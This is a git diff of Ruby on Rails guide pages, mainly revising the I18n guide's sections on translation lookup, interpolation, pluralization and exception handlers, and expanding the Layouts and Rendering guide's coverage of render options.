    translate also takes a :scope option which can contain one or many additional keys that will be used to specify a “namespace” or scope for a translation key:

    -
    I18n.t :invalid, :scope => [:active_record, :error_messages]
    -
    -

    This looks up the :invalid message in the ActiveRecord error messages.

    -

    Additionally, both the key and scopes can be specified as dot separated keys as in:

    +
    I18n.t :invalid, :scope => [:active_record, :error_messages]
    +

    This looks up the :invalid message in the ActiveRecord error messages.

    +

    Additionally, both the key and scopes can be specified as dot separated keys as in:

    -
    I18n.translate :"active_record.error_messages.invalid"
    -
    -

    Thus the following calls are equivalent:

    +
    I18n.translate :"active_record.error_messages.invalid"
    +

    Thus the following calls are equivalent:

    I18n.t 'active_record.error_messages.invalid'
     I18n.t 'error_messages.invalid', :scope => :active_record
     I18n.t :invalid, :scope => 'active_record.error_messages'
    -I18n.t :invalid, :scope => [:active_record, :error_messages]
    -
    -

    3.1.2. Defaults

    -

    When a default option is given its value will be returned if the translation is missing:

    +I18n.t :invalid, :scope => [:active_record, :error_messages] +

    4.1.2. Defaults

    +

    When a default option is given its value will be returned if the translation is missing:

    I18n.t :missing, :default => 'Not here'
    -# => 'Not here'
    -
    -

    If the default value is a Symbol it will be used as a key and translated. One can provide multiple values as default. The first one that results in a value will be returned.

    -

    E.g. the following first tries to translate the key :missing and then the key :also_missing. As both do not yield a result the string ‘Not here’ will be returned:

    +# => 'Not here' +

    If the default value is a Symbol it will be used as a key and translated. One can provide multiple values as default. The first one that results in a value will be returned.

    +

    E.g. the following first tries to translate the key :missing and then the key :also_missing. As both do not yield a result the string "Not here" will be returned:

    I18n.t :missing, :default => [:also_missing, 'Not here']
    -# => 'Not here'
    -
    -

    3.1.3. Bulk and namespace lookup

    -

    To lookup multiple translations at once an array of keys can be passed:

    +# => 'Not here' +

    4.1.3. Bulk and namespace lookup

    +

    To lookup multiple translations at once an array of keys can be passed:

    I18n.t [:odd, :even], :scope => 'active_record.error_messages'
    -# => ["must be odd", "must be even"]
    -
    -

    Also, a key can translate to a (potentially nested) hash as grouped translations. E.g. one can receive all ActiveRecord error messages as a Hash with:

    +# => ["must be odd", "must be even"] +

    Also, a key can translate to a (potentially nested) hash as grouped translations. E.g. one can receive all ActiveRecord error messages as a Hash with:

    I18n.t 'active_record.error_messages'
    -# => { :inclusion => "is not included in the list", :exclusion => ... }
    -
    -

    3.2. Interpolation

    -

    TODO explain what this is good for

    -

    All options besides :default and :scope that are passed to #translate will be interpolated to the translation:

    +# => { :inclusion => "is not included in the list", :exclusion => ... } +

    4.2. Interpolation

    +

    In many cases you want to abstract your translations so that variables can be interpolated into the translation. For this reason the I18n API provides an interpolation feature.

    +

    All options besides :default and :scope that are passed to #translate will be interpolated to the translation:

    -
    I18n.backend.store_translations 'en', :thanks => 'Thanks {{name}}!'
    +
    I18n.backend.store_translations :en, :thanks => 'Thanks {{name}}!'
     I18n.translate :thanks, :name => 'Jeremy'
    -# => 'Thanks Jeremy!'
    -
    -

    If a translation uses :default or :scope as a interpolation variable an I18n::ReservedInterpolationKey exception is raised. If a translation expects an interpolation variable but it has not been passed to #translate an I18n::MissingInterpolationArgument exception is raised.

    -

    3.3. Pluralization

    -

    TODO explain what this is good for

    -

    The :count interpolation variable has a special role in that it both is interpolated to the translation and used to pick a pluralization from the translations according to the pluralization rules defined by CLDR:

    +# => 'Thanks Jeremy!'
    +

    If a translation uses :default or :scope as a interpolation variable an I18n::ReservedInterpolationKey exception is raised. If a translation expects an interpolation variable but it has not been passed to #translate an I18n::MissingInterpolationArgument exception is raised.

    +

    4.3. Pluralization

    +

    In English there’s only a singular and a plural form for a given string, e.g. "1 message" and "2 messages". Other languages (Arabic, Japanese, Russian and many more) have different grammars that have additional or less plural forms. Thus, the I18n API provides a flexible pluralization feature.

    +

    The :count interpolation variable has a special role in that it both is interpolated to the translation and used to pick a pluralization from the translations according to the pluralization rules defined by CLDR:

    -
    I18n.backend.store_translations 'en-US', :inbox => { # TODO change this
    +
    I18n.backend.store_translations :en, :inbox => {
       :one => '1 message',
       :other => '{{count}} messages'
     }
     I18n.translate :inbox, :count => 2
    -# => '2 messages'
    -
    -

    The algorithm for pluralizations in en-US is as simple as:

    +# => '2 messages'
    +

    The algorithm for pluralizations in :en is as simple as:

    -
    entry[count == 1 ? 0 : 1]
    -
    -

    I.e. the translation denoted as :one is regarded as singular, the other is used as plural (including the count being zero).

    -

    If the lookup for the key does not return an Hash suitable for pluralization an I18n::InvalidPluralizationData exception is raised.

    -

    3.4. Setting and passing a locale

    -

    The locale can be either set pseudo-globally to I18n.locale (which uses Thread.current like, e.g., Time.zone) or can be passed as an option to #translate and #localize.

    -

    If no locale is passed I18n.locale is used:

    +
    entry[count == 1 ? 0 : 1]
    +

    I.e. the translation denoted as :one is regarded as singular, the other is used as plural (including the count being zero).

    +

    If the lookup for the key does not return an Hash suitable for pluralization an I18n::InvalidPluralizationData exception is raised.

    +

    4.4. Setting and passing a locale

    +

    The locale can be either set pseudo-globally to I18n.locale (which uses Thread.current like, e.g., Time.zone) or can be passed as an option to #translate and #localize.

    +

    If no locale is passed I18n.locale is used:

    -
    I18n.locale = :'de'
    +
    I18n.locale = :de
     I18n.t :foo
    -I18n.l Time.now
    -
    -

    Explicitely passing a locale:

    +I18n.l Time.now
    +

    Explicitely passing a locale:

    -
    I18n.t :foo, :locale => :'de'
    -I18n.l Time.now, :locale => :'de'
    -
    -

    I18n.locale defaults to I18n.default_locale which defaults to :en. The default locale can be set like this:

    +
    I18n.t :foo, :locale => :de
    +I18n.l Time.now, :locale => :de
    +

    I18n.locale defaults to I18n.default_locale which defaults to :en. The default locale can be set like this:

    -
    I18n.default_locale = :'de'
    -
    +
    I18n.default_locale = :de
    -

    4. How to store your custom translations

    +

    5. How to store your custom translations

    -

    The shipped Simple backend allows you to store translations in both plain Ruby and YAML format. (2)

    -

    For example a Ruby Hash providing translations can look like this:

    +

    The shipped Simple backend allows you to store translations in both plain Ruby and YAML format. [2]

    +

    For example a Ruby Hash providing translations can look like this:

    {
    -  :'pt-BR' => {
    +  :pt => {
         :foo => {
           :bar => "baz"
         }
       }
    -}
    -
    -

    The equivalent YAML file would look like this:

    +}
    +

    The equivalent YAML file would look like this:

    -
    "pt-BR":
    +
    pt:
       foo:
    -    bar: baz
    -
    -

    As you see in both cases the toplevel key is the locale. :foo is a namespace key and :bar is the key for the translation "baz".

    -

    Here is a "real" example from the ActiveSupport en-US translations YAML file:

    + bar: baz
    +

    As you see in both cases the toplevel key is the locale. :foo is a namespace key and :bar is the key for the translation "baz".

    +

    Here is a "real" example from the ActiveSupport en.yml translations YAML file:

    -
    "en":
    +
    en:
       date:
         formats:
           default: "%Y-%m-%d"
           short: "%b %d"
    -      long: "%B %d, %Y"
    -
    -

    So, all of the following equivalent lookups will return the :short date format "%B %d":

    + long: "%B %d, %Y"
    +

    So, all of the following equivalent lookups will return the :short date format "%B %d":

    I18n.t 'date.formats.short'
     I18n.t 'formats.short', :scope => :date
     I18n.t :short, :scope => 'date.formats'
    -I18n.t :short, :scope => [:date, :formats]
    -
    -

    4.1. Translations for ActiveRecord models

    -

    You can use the methods Model.human_name and Model.human_attribute_name(attribute) to transparently lookup translations for your model and attribute names.

    -

    For example when you add the following translations:

    -

    en: - activerecord: - models: - user: Dude - attributes: - user: - login: "Handle" - # will translate User attribute "login" as "Handle"

    -

    Then User.human_name will return "Dude" and User.human_attribute_name(:login) will return "Handle".

    -

    4.1.1. Error message scopes

    -

    ActiveRecord validation error messages can also be translated easily. ActiveRecord gives you a couple of namespaces where you can place your message translations in order to provide different messages and translation for certain models, attributes and/or validations. It also transparently takes single table inheritance into account.

    -

    This gives you quite powerful means to flexibly adjust your messages to your application's needs.

    -

    Consider a User model with a validates_presence_of validation for the name attribute like this:

    +I18n.t :short, :scope => [:date, :formats] +

    Generally we recommend using YAML as a format for storing translations. There are cases though where you want to store Ruby lambdas as part of your locale data, e.g. for special date

    +

    5.1. Translations for ActiveRecord models

    +

    You can use the methods Model.human_name and Model.human_attribute_name(attribute) to transparently lookup translations for your model and attribute names.

    +

    For example when you add the following translations:

    -
    class User < ActiveRecord::Base
    -  validates_presence_of :name
    -end
    -
    -

    The key for the error message in this case is :blank. So ActiveRecord will first try to look up an error message with:

    +
    en:
    +  activerecord:
    +    models:
    +      user: Dude
    +    attributes:
    +      user:
    +        login: "Handle"
    +      # will translate User attribute "login" as "Handle"
    +

    Then User.human_name will return "Dude" and User.human_attribute_name(:login) will return "Handle".

    +

    5.1.1. Error message scopes

    +

    ActiveRecord validation error messages can also be translated easily. ActiveRecord gives you a couple of namespaces where you can place your message translations in order to provide different messages and translation for certain models, attributes and/or validations. It also transparently takes single table inheritance into account.

    +

    This gives you quite powerful means to flexibly adjust your messages to your application’s needs.

    +

    Consider a User model with a validates_presence_of validation for the name attribute like this:

    -
    activerecord.errors.messages.models.user.attributes.name.blank
    -
    -

    If it's not there it will try:

    +
    class User < ActiveRecord::Base
    +  validates_presence_of :name
    +end
    +

    The key for the error message in this case is :blank. ActiveRecord will lookup this key in the namespaces:

    -
    activerecord.errors.messages.models.user.blank
    -
    -

    If this is also not there it will use the default message from:

    +
    activerecord.errors.messages.models.[model_name].attributes.[attribute_name]
    +activerecord.errors.messages.models.[model_name]
    +activerecord.errors.messages
    +

    Thus, in our example it will try the following keys in this order and return the first result:

    -
    activerecord.errors.messages.blank
    -
    -

    When your models are additionally using inheritance then the messages are looked up for the inherited model class names are looked up.

    -

    For example, you might have an Admin model inheriting from User:

    +
    activerecord.errors.messages.models.user.attributes.name.blank
    +activerecord.errors.messages.models.user.blank
    +activerecord.errors.messages.blank
    +

    When your models are additionally using inheritance then the messages are looked up for the inherited model class names are looked up.

    +

    For example, you might have an Admin model inheriting from User:

    class Admin < User
       validates_presence_of :name
    -end
    -
    -

    Then ActiveRecord will look for messages in this order:

    +end +

    Then ActiveRecord will look for messages in this order:

    activerecord.errors.models.admin.blank activerecord.errors.models.user.attributes.title.blank activerecord.errors.models.user.blank -activerecord.errors.messages.blank -
    -

    This way you can provide special translations for various error messages at different points in your models inheritance chain and in the attributes, models or default scopes.

    -

    4.1.2. Error message interpolation

    -

    The translated model name and translated attribute name are always available for interpolation.

    -

    -

    Count and/or value are available where applicable. Count can be used for pluralization if present:

    +activerecord.errors.messages.blank +

    This way you can provide special translations for various error messages at different points in your models inheritance chain and in the attributes, models or default scopes.

    +

    5.1.2. Error message interpolation

    +

    The translated model name and translated attribute name are always available for interpolation.

    +

    +

    count and/or value are available where applicable. Count can be used for pluralization if present:

    ----++++ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    - validation - - with option - - message - - interpolation -
    - validates_confirmation_of - - - - - :confirmation - - - -
    - validates_acceptance_of - - - - - :accepted - - - -
    - validates_presence_of - - - - - :blank - - - -
    - validates_length_of - - :within, :in - - :too_short - - count -
    - validates_length_of - - :within, :in - - :too_long - - count -
    - validates_length_of - - :is - - :wrong_length - - count -
    - validates_length_of - - :minimum - - :too_short - - count -
    - validates_length_of - - :maximum - - :too_long - - count -
    - validates_uniqueness_of - - - - - :taken - - value -
    - validates_format_of - - - - - :invalid - - value -
    - validates_inclusion_of - - - - - :inclusion - - value -
    - validates_exclusion_of - - - - - :exclusion - - value -
    - validates_associated - - - - - :invalid - - value -
    - validates_numericality_of - - - - - :not_a_number - - value -
    - validates_numericality_of - - :odd - - :odd - - value -
    - validates_numericality_of - - :even - - :even - - value -

    validation

    with option

    message

    interpolation

    validates_confirmation_of

    -

    :confirmation

    -

    validates_acceptance_of

    -

    :accepted

    -

    validates_presence_of

    -

    :blank

    -

    validates_length_of

    :within, :in

    :too_short

    count

    validates_length_of

    :within, :in

    :too_long

    count

    validates_length_of

    :is

    :wrong_length

    count

    validates_length_of

    :minimum

    :too_short

    count

    validates_length_of

    :maximum

    :too_long

    count

    validates_uniqueness_of

    -

    :taken

    value

    validates_format_of

    -

    :invalid

    value

    validates_inclusion_of

    -

    :inclusion

    value

    validates_exclusion_of

    -

    :exclusion

    value

    validates_associated

    -

    :invalid

    value

    validates_numericality_of

    -

    :not_a_number

    value

    validates_numericality_of

    :odd

    :odd

    value

    validates_numericality_of

    :even

    :even

    value

    -

    4.1.3. Translations for the ActiveRecord error_messages_for helper

    -

    If you are using the ActiveRecord error_messages_for helper you will want to add translations for it.

    -

    Rails ships with the following translations:

    +

    5.1.3. Translations for the ActiveRecord error_messages_for helper

    +

    If you are using the ActiveRecord error_messages_for helper you will want to add translations for it.

    +

    Rails ships with the following translations:

    -
    "en":
    +
    en:
       activerecord:
         errors:
           template:
             header:
               one:   "1 error prohibited this {{model}} from being saved"
               other: "{{count}} errors prohibited this {{model}} from being saved"
    -        body: "There were problems with the following fields:"
    -
    -

    4.2. Other translations and localizations

    -

    Rails uses fixed strings and other localizations, such as format strings and other format information in a couple of helpers.

    -

    TODO list helpers and available keys

    + body: "There were problems with the following fields:"
    +

    5.2. Other translations and localizations

    +

    Rails uses fixed strings and other localizations, such as format strings and other format information in a couple of helpers.

    +

    TODO list helpers and available keys

    -

    5. Customize your I18n setup

    +

    6. Customize your I18n setup

    -

    5.1. Using different backends

    -

    For several reasons the shipped Simple backend only does the "simplest thing that ever could work" for Ruby on Rails (1) … which means that it is only guaranteed to work for English and, as a side effect, languages that are very similar to English. Also, the simple backend is only capable of reading translations but can not dynamically store them to any format.

    -

    That does not mean you're stuck with these limitations though. The Ruby I18n gem makes it very easy to exchange the Simple backend implementation with something else that fits better for your needs. E.g. you could exchange it with Globalize's Static backend:

    +

    6.1. Using different backends

    +

    For several reasons the shipped Simple backend only does the "simplest thing that ever could work" for Ruby on Rails [3] ... which means that it is only guaranteed to work for English and, as a side effect, languages that are very similar to English. Also, the simple backend is only capable of reading translations but can not dynamically store them to any format.

    +

    That does not mean you’re stuck with these limitations though. The Ruby I18n gem makes it very easy to exchange the Simple backend implementation with something else that fits better for your needs. E.g. you could exchange it with Globalize’s Static backend:

    -
    I18n.backend = Globalize::Backend::Static.new
    -
    -

    TODO expand this …? list some backends and their features?

    -

    5.2. Using different exception handlers

    -

    TODO

    -
      -
    • -

      -Explain what exceptions are raised and why we are using exceptions for communication from backend to frontend. -

      -
    • -
    • -

      -Explain the default behaviour. -

      -
    • -
    • -

      -Explain the :raise option -

      -
    • -
    • -

      -Example 1: the Rails #t helper uses a custom exception handler that catches I18n::MissingTranslationData and wraps the message into a span with the CSS class "translation_missing" -

      -
    • -
    • -

      -Example 2: for tests you might want a handler that just raises all exceptions all the time -

      -
    • -
    • -

      -Example 3: a handler -

      -
    • -
    +
    I18n.backend = Globalize::Backend::Static.new
    +

    6.2. Using different exception handlers

    +

    The I18n API defines the following exceptions that will be raised by backends when the corresponding unexpected conditions occur:

    +
    +
    +
    MissingTranslationData       # no translation was found for the requested key
    +InvalidLocale                # the locale set to I18n.locale is invalid (e.g. nil)
    +InvalidPluralizationData     # a count option was passed but the translation data is not suitable for pluralization
    +MissingInterpolationArgument # the translation expects an interpolation argument that has not been passed
    +ReservedInterpolationKey     # the translation contains a reserved interpolation variable name (i.e. one of: scope, default)
    +UnknownFileType              # the backend does not know how to handle a file type that was added to I18n.load_path
    +

    The I18n API will catch all of these exceptions when they were thrown in the backend and pass them to the default_exception_handler method. This method will re-raise all exceptions except for MissingTranslationData exceptions. When a MissingTranslationData exception has been caught it will return the exception’s error message string containing the missing key/scope.

    +

    The reason for this is that during development you’d usually want your views to still render even though a translation is missing.

    +

    In other contexts you might want to change this behaviour though. E.g. the default exception handling does not allow to catch missing translations during automated tests easily. For this purpose a different exception handler can be specified. The specified exception handler must be a method on the I18n module:

    +
    +
    +
    module I18n
    +  def just_raise_that_exception(*args)
    +    raise args.first
    +  end
    +end
    +
    +I18n.exception_handler = :just_raise_that_exception
    +

    This would re-raise all caught exceptions including MissingTranslationData.

    +

    Another example where the default behaviour is less desirable is the Rails TranslationHelper which provides the method #t (as well as #translate). When a MissingTranslationData exception occurs in this context the helper wraps the message into a span with the css class translation_missing.

    +

    To do so the helper forces I18n#translate to raise exceptions no matter what exception handler is defined by setting the :raise option:

    +
    +
    +
    I18n.t :foo, :raise => true # always re-raises exceptions from the backend
    -

    6. Resources

    +

    7. Resources

    -
    -

    7. Footnotes

    +

    8. Footnotes

    -

    (1) One of these reasons is that we don't want to any unnecessary load for applications that do not need any I18n capabilities, so we need to keep the I18n library as simple as possible for English. Another reason is that it is virtually impossible to implement a one-fits-all solution for all problems related to I18n for all existing languages. So a solution that allows us to exchange the entire implementation easily is appropriate anyway. This also makes it much easier to experiment with custom features and extensions.

    -

    (2) Other backends might allow or require to use other formats, e.g. a GetText backend might allow to read GetText files.

    +

    [1] Or, to quote Wikipedia: "Internationalization is the process of designing a software application so that it can be adapted to various languages and regions without engineering changes. Localization is the process of adapting software for a specific region or language by adding locale-specific components and translating text."

    +

    [2] Other backends might allow or require to use other formats, e.g. a GetText backend might allow to read GetText files.

    +

    [3] One of these reasons is that we don’t want to any unnecessary load for applications that do not need any I18n capabilities, so we need to keep the I18n library as simple as possible for English. Another reason is that it is virtually impossible to implement a one-fits-all solution for all problems related to I18n for all existing languages. So a solution that allows us to exchange the entire implementation easily is appropriate anyway. This also makes it much easier to experiment with custom features and extensions.

    -

    8. Credits

    +

    9. Credits

    -

    9. NOTES

    +

    10. NOTES

    -

    How to contribute?

    +

    How to contribute?

    diff --git a/railties/doc/guides/html/index.html b/railties/doc/guides/html/index.html index 45e131012e..332a9668e5 100644 --- a/railties/doc/guides/html/index.html +++ b/railties/doc/guides/html/index.html @@ -2,7 +2,7 @@ - Ruby on Rails guides + Ruby on Rails Guides @@ -196,9 +196,22 @@ ul#navMain {
    -

    Ruby on Rails guides

    +

    Ruby on Rails Guides

    +

    These guides are designed to make you immediately productive with Rails, and to help you understand how all of the pieces fit together. There are two different versions of the Guides site, and you should be sure to use the one that applies to your situation:

    +
    @@ -219,18 +232,18 @@ ul#navMain {

    Models

    Lighthouse Ticket
    -

    This guide covers the find method defined in ActiveRecord::Base, as well as named scopes.

    +

    This guide covers the find method defined in ActiveRecord::Base, as well as named scopes.

    Views

    @@ -264,19 +277,19 @@ with partials.

    Lighthouse Ticket
    -

    Guide to using built in Form helpers.

    +

    Guide to using built in Form helpers.

    Controllers

    -

    This guide covers the three types of caching that Rails provides by default.

    +

    This guide covers the three types of caching that Rails provides by default.

    Digging Deeper

    @@ -303,20 +316,20 @@ understand how to use routing in your own Rails applications, start here.

    Lighthouse Ticket
    -

    This is a rather comprehensive guide to doing both unit and functional tests +

    This is a rather comprehensive guide to doing both unit and functional tests in Rails. It covers everything from “What is a test?” to the testing APIs. Enjoy.

    @@ -331,12 +344,12 @@ of your code.

    Lighthouse Ticket
    -

    This guide covers ways to analyze and optimize your running Rails code.

    +

    This guide covers ways to analyze and optimize your running Rails code.

    still a basic draft
    -

    This guide introduces you to the basic concepts and features of the Rails I18n API and shows you how to localize your application.

    +

    This guide introduces you to the basic concepts and features of the Rails I18n API and shows you how to localize your application.

    -

    Authors who have contributed to complete guides are listed here.

    - +

    Authors who have contributed to complete guides are listed here.

    + diff --git a/railties/doc/guides/html/layouts_and_rendering.html b/railties/doc/guides/html/layouts_and_rendering.html index 30c114ef82..a94c2d4b57 100644 --- a/railties/doc/guides/html/layouts_and_rendering.html +++ b/railties/doc/guides/html/layouts_and_rendering.html @@ -227,6 +227,8 @@ ul#navMain {
  • Using Partials
  • +
  • Using Nested Layouts
  • +
  • @@ -239,8 +241,8 @@ ul#navMain {

    Layouts and Rendering in Rails

    -

    This guide covers the basic layout features of Action Controller and Action View. By referring to this guide, you will be able to:

    -
      +

      This guide covers the basic layout features of Action Controller and Action View. By referring to this guide, you will be able to:

      +
      • Use the various rendering methods built in to Rails @@ -256,18 +258,23 @@ Create layouts with multiple content sections Use partials to DRY up your views

      • +
      • +

        +Use nested layouts (sub-templates) +

        +

    1. Overview: How the Pieces Fit Together

    -

    This guide focuses on the interaction between Controller and View in the Model-View-Controller triangle. As you know, the Controller is responsible for orchestrating the whole process of handling a request in Rails, though it normally hands off any heavy code to the Model. But then, when it's time to send a response back to the user, the Controller hands things off to the View. It's that handoff that is the subject of this guide.

    -

    In broad strokes, this involves deciding what should be sent as the response and calling an appropriate method to create that response. If the response is a full-blown view, Rails also does some extra work to wrap the view in a layout and possibly to pull in partial views. You'll see all of those paths later in this guide.

    +

    This guide focuses on the interaction between Controller and View in the Model-View-Controller triangle. As you know, the Controller is responsible for orchestrating the whole process of handling a request in Rails, though it normally hands off any heavy code to the Model. But then, when it’s time to send a response back to the user, the Controller hands things off to the View. It’s that handoff that is the subject of this guide.

    +

    In broad strokes, this involves deciding what should be sent as the response and calling an appropriate method to create that response. If the response is a full-blown view, Rails also does some extra work to wrap the view in a layout and possibly to pull in partial views. You’ll see all of those paths later in this guide.

    2. Creating Responses

    -

    From the controller's point of view, there are three ways to create an HTTP response:

    -
      +

      From the controller’s point of view, there are three ways to create an HTTP response:

      +
      • Call render to create a full response to send back to the browser @@ -284,9 +291,9 @@ Call head to create a response consisting solely of HTTP headers to sen

      -

      I'll cover each of these methods in turn. But first, a few words about the very easiest thing that the controller can do to create a response: nothing at all.

      +

      I’ll cover each of these methods in turn. But first, a few words about the very easiest thing that the controller can do to create a response: nothing at all.

      2.1. Rendering by Default: Convention Over Configuration in Action

      -

      You've heard that Rails promotes "convention over configuration." Default rendering is an excellent example of this. By default, controllers in Rails automatically render views with names that correspond to actions. For example, if you have this code in your BooksController class:

      +

      You’ve heard that Rails promotes "convention over configuration." Default rendering is an excellent example of this. By default, controllers in Rails automatically render views with names that correspond to actions. For example, if you have this code in your BooksController class:

      def show
         @book = Book.find(params[:id])
      -end
      -
      -

      Rails will automatically render app/views/books/show.html.erb after running the method. In fact, if you have the default catch-all route in place (map.connect :controller/:action/:id), Rails will even render views that don't have any code at all in the controller. For example, if you have the default route in place and a request comes in for /books/sale_list, Rails will render app/views/books/sale_list.html.erb in response.

      +end
    +

    Rails will automatically render app/views/books/show.html.erb after running the method. In fact, if you have the default catch-all route in place (map.connect ':controller/:action/:id'), Rails will even render views that don’t have any code at all in the controller. For example, if you have the default route in place and a request comes in for /books/sale_list, Rails will render app/views/books/sale_list.html.erb in response.

    - +
    Note The actual rendering is done by subclasses of ActionView::TemplateHandlers. This guide does not dig into that process, but it's important to know that the file extension on your view controls the choice of template handler. In Rails 2, the standard extensions are .erb for ERB (HTML with embedded Ruby), .rjs for RJS (javascript with embedded ruby) and .builder for Builder (XML generator). You'll also find .rhtml used for ERB templates and .rxml for Builder templates, but those extensions are now formally deprecated and will be removed from a future version of Rails.The actual rendering is done by subclasses of ActionView::TemplateHandlers. This guide does not dig into that process, but it’s important to know that the file extension on your view controls the choice of template handler. In Rails 2, the standard extensions are .erb for ERB (HTML with embedded Ruby), .rjs for RJS (javascript with embedded ruby) and .builder for Builder (XML generator). You’ll also find .rhtml used for ERB templates and .rxml for Builder templates, but those extensions are now formally deprecated and will be removed from a future version of Rails.

    2.2. Using render

    -

    In most cases, the ActionController::Base#render method does the heavy lifting of rendering your application's content for use by a browser. There are a variety of ways to customize the behavior of render. You can render the default view for a Rails template, or a specific template, or a file, or inline code, or nothing at all. You can render text, JSON, or XML. You can specify the content type or HTTP status of the rendered response as well.

    +

    In most cases, the ActionController::Base#render method does the heavy lifting of rendering your application’s content for use by a browser. There are a variety of ways to customize the behavior of render. You can render the default view for a Rails template, or a specific template, or a file, or inline code, or nothing at all. You can render text, JSON, or XML. You can specify the content type or HTTP status of the rendered response as well.

    @@ -316,25 +322,55 @@ http://www.gnu.org/software/src-highlite -->

    2.2.1. Rendering Nothing

    -

    Perhaps the simplest thing you can do with render is to render nothing at all:

    +

    Perhaps the simplest thing you can do with render is to render nothing at all:

    -
    render :nothing => true
    -
    -

    This will send an empty response to the browser (though it will include any status headers you set with the :status option, discussed below).

    +
    render :nothing => true
    +

    This will send an empty response to the browser (though it will include any status headers you set with the :status option, discussed below).

    - +
    Tip You should probably be using the head method, discussed later in this guide, instead of render :nothing. This provides additional flexibility and makes it explicit that you're only generating HTTP headers.You should probably be using the head method, discussed later in this guide, instead of render :nothing. This provides additional flexibility and makes it explicit that you’re only generating HTTP headers.
    -

    2.2.2. Using render with :action

    -

    If you want to render the view that corresponds to a different action within the same template, you can use render with the :action option:

    +

    2.2.2. Rendering an Action’s View

    +

    If you want to render the view that corresponds to a different action within the same template, you can use render with the name of the view:

    +
    +
    +
    def update
    +  @book = Book.find(params[:id])
    +    if @book.update_attributes(params[:book])
    +      redirect_to(@book)
    +    else
    +      render "edit"
    +    end
    +  end
    +end
    +

    If the call to update_attributes fails, calling the update action in this controller will render the edit.html.erb template belonging to the same controller.

    +

    If you prefer, you can use a symbol instead of a string to specify the action to render:

    +
    +
    +
    def update
    +  @book = Book.find(params[:id])
    +    if @book.update_attributes(params[:book])
    +      redirect_to(@book)
    +    else
    +      render :edit
    +    end
    +  end
    +end
    +

    To be explicit, you can use render with the :action option (though this is no longer necessary as of Rails 2.3):

    render :action => "edit" end end -end -
    -

    If the call to update_attributes_ fails, calling the +update action in this controller will render the edit.html.erb template belonging to the same controller.

    +end
    @@ -359,42 +393,61 @@ http://www.gnu.org/software/src-highlite --> Using render with :action is a frequent source of confusion for Rails newcomers. The specified action is used to determine which view to render, but Rails does not run any of the code for that action in the controller. Any instance variables that you require in the view must be set up in the current action before calling render.
    -

    2.2.3. Using render with :template

    -

    What if you want to render a template from an entirely different controller from the one that contains the action code? You can do that with the :template option to render, which accepts the full path (relative to app/views) of the template to render. For example, if you're running code in an AdminProductsController that lives in app/controllers/admin, you can render the results of an action to a template in app/views/products this way:

    +

    2.2.3. Rendering an Action’s Template from Another Controller

    +

    What if you want to render a template from an entirely different controller from the one that contains the action code? You can also do that with render, which accepts the full path (relative to app/views) of the template to render. For example, if you’re running code in an AdminProductsController that lives in app/controllers/admin, you can render the results of an action to a template in app/views/products this way:

    -
    render :template => 'products/show'
    -
    -

    2.2.4. Using render with :file

    -

    If you want to use a view that's entirely outside of your application (perhaps you're sharing views between two Rails applications), you can use the :file option to render:

    +
    render 'products/show'
    +

    Rails knows that this view belongs to a different controller because of the embedded slash character in the string. If you want to be explicit, you can use the :template option (which was required on Rails 2.2 and earlier):

    -
    render :file => "/u/apps/warehouse_app/current/app/views/products/show"
    -
    -

    The :file option takes an absolute file-system path. Of course, you need to have rights to the view that you're using to render the content.

    +
    render :template => 'products/show'
    +

    2.2.4. Rendering an Arbitrary File

    +

    The render method can also use a view that’s entirely outside of your application (perhaps you’re sharing views between two Rails applications):

    +
    +
    +
    render "/u/apps/warehouse_app/current/app/views/products/show"
    +

    Rails determines that this is a file render because of the leading slash character. To be explicit, you can use the :file option (which was required on Rails 2.2 and earlier):

    +
    +
    +
    render :file => "/u/apps/warehouse_app/current/app/views/products/show"
    +

    The :file option takes an absolute file-system path. Of course, you need to have rights to the view that you’re using to render the content.

    - + +
    Note By default, if you use the :file option, the file is rendered without using the current layout. If you want Rails to put the file into the current layout, you need to add the :layout ⇒ true optionBy default, the file is rendered without using the current layout. If you want Rails to put the file into the current layout, you need to add the :layout => true option.
    +
    +
    + + +
    +Tip +If you’re running on Microsoft Windows, you should use the :file option to render a file, because Windows filenames do not have the same format as Unix filenames.

    2.2.5. Using render with :inline

    -

    The render method can do without a view completely, if you're willing to use the :inline option to supply ERB as part of the method call. This is perfectly valid:

    +

    The render method can do without a view completely, if you’re willing to use the :inline option to supply ERB as part of the method call. This is perfectly valid:

    -
    render :inline => "<% products.each do |p| %><p><%= p.name %><p><% end %>"
    -
    +
    render :inline => "<% products.each do |p| %><p><%= p.name %><p><% end %>"
    @@ -403,16 +456,15 @@ http://www.gnu.org/software/src-highlite --> There is seldom any good reason to use this option. Mixing ERB into your controllers defeats the MVC orientation of Rails and will make it harder for other developers to follow the logic of your project. Use a separate erb view instead.
    -

    By default, inline rendering uses ERb. You can force it to use Builder instead with the :type option:

    +

    By default, inline rendering uses ERb. You can force it to use Builder instead with the :type option:

    -
    render :inline => "xml.p {'Horrid coding practice!'}", :type => :builder
    -
    +
    render :inline => "xml.p {'Horrid coding practice!'}", :type => :builder

    2.2.6. Using render with :update

    -

    You can also render javascript-based page updates inline using the :update option to render:

    +

    You can also render javascript-based page updates inline using the :update option to render:

    render :update do |page|
       page.replace_html 'warning', "Invalid options supplied"
    -end
    -
    +end
    @@ -431,20 +482,19 @@ http://www.gnu.org/software/src-highlite -->

    2.2.7. Rendering Text

    -

    You can send plain text - with no markup at all - back to the browser by using the :text option to render:

    +

    You can send plain text - with no markup at all - back to the browser by using the :text option to render:

    -
    render :text => "OK"
    -
    +
    render :text => "OK"
    - +
    Tip Rendering pure text is most useful when you're responding to AJAX or web service requests that are expecting something other than proper HTML.Rendering pure text is most useful when you’re responding to AJAX or web service requests that are expecting something other than proper HTML.
    @@ -452,56 +502,53 @@ http://www.gnu.org/software/src-highlite --> Note -By default, if you use the :text option, the file is rendered without using the current layout. If you want Rails to put the text into the current layout, you need to add the :layout ⇒ true option +By default, if you use the :text option, the file is rendered without using the current layout. If you want Rails to put the text into the current layout, you need to add the :layout => true option

    2.2.8. Rendering JSON

    -

    JSON is a javascript data format used by many AJAX libraries. Rails has built-in support for converting objects to JSON and rendering that JSON back to the browser:

    +

    JSON is a javascript data format used by many AJAX libraries. Rails has built-in support for converting objects to JSON and rendering that JSON back to the browser:

    -
    render :json => @product
    -
    +
    render :json => @product
    - +
